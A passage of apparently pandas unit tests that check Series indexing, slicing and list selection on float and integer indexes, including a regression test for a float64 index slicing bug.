pytest.raises(KeyError, lambda: s.loc[4])
pytest.raises(KeyError, lambda: s[4])
# fancy floats/integers create the correct entry (as nan)
# fancy tests
expected = Series([2, 0], index=Float64Index([5.0, 0.0]))
for fancy_idx in [[5.0, 0.0], np.array([5.0, 0.0])]: # float
assert_series_equal(s[fancy_idx], expected)
assert_series_equal(s.loc[fancy_idx], expected)
assert_series_equal(s.loc[fancy_idx], expected)
expected = Series([2, 0], index=Index([5, 0], dtype='int64'))
for fancy_idx in [[5, 0], np.array([5, 0])]: # int
assert_series_equal(s[fancy_idx], expected)
assert_series_equal(s.loc[fancy_idx], expected)
assert_series_equal(s.loc[fancy_idx], expected)
# all should return the same as we are slicing 'the same'
result1 = s.loc[2:5]
result2 = s.loc[2.0:5.0]
result3 = s.loc[2.0:5]
result4 = s.loc[2.1:5]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
assert_series_equal(result1, result4)
# previously this did fallback indexing
result1 = s[2:5]
result2 = s[2.0:5.0]
result3 = s[2.0:5]
result4 = s[2.1:5]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
assert_series_equal(result1, result4)
result1 = s.loc[2:5]
result2 = s.loc[2.0:5.0]
result3 = s.loc[2.0:5]
result4 = s.loc[2.1:5]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
assert_series_equal(result1, result4)
# combined test
result1 = s.loc[2:5]
result2 = s.loc[2:5]
result3 = s[2:5]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
# list selection
result1 = s[[0.0, 5, 10]]
result2 = s.loc[[0.0, 5, 10]]
result3 = s.loc[[0.0, 5, 10]]
result4 = s.iloc[[0, 2, 4]]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
assert_series_equal(result1, result4)
result1 = s[[1.6, 5, 10]]
result2 = s.loc[[1.6, 5, 10]]
result3 = s.loc[[1.6, 5, 10]]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
assert_series_equal(result1, Series(
[np.nan, 2, 4], index=[1.6, 5, 10]))
result1 = s[[0, 1, 2]]
result2 = s.loc[[0, 1, 2]]
result3 = s.loc[[0, 1, 2]]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
assert_series_equal(result1, Series(
[0.0, np.nan, np.nan], index=[0, 1, 2]))
result1 = s.loc[[2.5, 5]]
result2 = s.loc[[2.5, 5]]
assert_series_equal(result1, result2)
assert_series_equal(result1, Series([1, 2], index=[2.5, 5.0]))
result1 = s[[2.5]]
result2 = s.loc[[2.5]]
result3 = s.loc[[2.5]]
assert_series_equal(result1, result2)
assert_series_equal(result1, result3)
assert_series_equal(result1, Series([1], index=[2.5]))
def test_floating_tuples(self):
# see gh-13509
s = Series([(1, 1), (2, 2), (3, 3)], index=[0.0, 0.1, 0.2], name='foo')
result = s[0.0]
assert result == (1, 1)
expected = Series([(1, 1), (2, 2)], index=[0.0, 0.0], name='foo')
s = Series([(1, 1), (2, 2), (3, 3)], index=[0.0, 0.0, 0.2], name='foo')
result = s[0.0]
tm.assert_series_equal(result, expected)
def test_float64index_slicing_bug(self):
# GH 5557, related to slicing a float index
ser = {256: 2321.0,
1: 78.0,
2: 2716.0,
3: 0.0,
4: 369.0,
5: 0.0,
6: 269.0,
7: 0.0,
8: 0.0,
9: 0.0,
10: 3536.0,
11: 0.0,
12: 24.0,
13: 0.0,
14: 931.0,
15: 0.0,
16: 101.0,
17: 78.0,
18: 9643.0,
19: 0.0,
20: 0.0,
21: 0.0,
22: 63761.0,
23: 0.0,
24: 446.0,
25: 0.0,
26: 34773.0,
27: 0.0,
28: 729.0,
29: 78.0,
30: 0.0,
31: 0.0,
32: 3374.0,
33: 0.0,
34: 1391.0,
35: 0.0,
36: 361.0,
37: 0.0,
38: 61808.0,
39: 0.0,
40: 0.0,
41: 0.0,
42: 6677.0,
43: 0.0,
44: 802.0,
45: 0.0,
46: 2691.0,
47: 0.0,
48: 3582.0,
49: 0.0,
50: 734.0,
51: 0.0,
52: 627.0,
53: 70.0,
54: 2584.0,
55: 0.0,
56: 324.0,
57: 0.0,
58: 605.0,
59: 0.0,
60: 0.0,
61: 0.0,
62: 3989.0,
63: 10.0,
64: 42.0,
65: 0.0,
66: 904.0,
67: 0.0,
68: 88.0,
69: 70.0,
70: 8172.0,
71: 0.0,
72: 0.0,
73: 0.0,
74: 64902.0,
75: 0.0,
76: 347.0,
77: 0.0,
78: 36605.0,
79: 0.0,
80: 379.0,
81: 70.0,
82: 0.0,
83: 0.0,
84: 3001.0,
85: 0.0,
86: 1630.0,
87: 7.0,
88: 364.0,
89: 0.0,
90: 67404.0,
91: 9.0,
92: 0.0,
93: 0.0,
94: 7685.0,
95: 0.0,
96: 1017.0,
97: 0.0,
98: 2831.0,
99: 0.0,
100: 2963.0,
101: 0.0,
102: 854.0,
103: 0.0,
104: 0.0,
105: 0.0,
106: 0.0,
107: 0.0,
108: 0.0,
109: 0.0,
110: 0.0,
111: 0.0,
112: 0.0,
113: 0.0,
114: 0.0,
115: 0.0,
116: 0.0,
117: 0.0,
118: 0.0,
119: 0.0,
120: 0.0,
121: 0.0,
122: 0.0,
123: 0.0,
124: 0.0,
125: 0.0,
126: 67744.0,
127: 22.0,
128: 264.0,
129: 0.0,
260: 197.0,
268: 0.0,
265: 0.0,
269: 0.0,
261: 0.0,
266: 1198.0,
267: 0.0,
262: 2629.0,
258: 775.0,
257: 0.0,
263: 0.0,
259: 0.0,
264: 163.0,
250: 10326.0,
251: 0.0,
252: 1228.0,
253: 0.0,
254: 2769.0,
255: 0.0}
# smoke test for the repr
s = Series(ser)
result = s.value_counts()
str(result)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.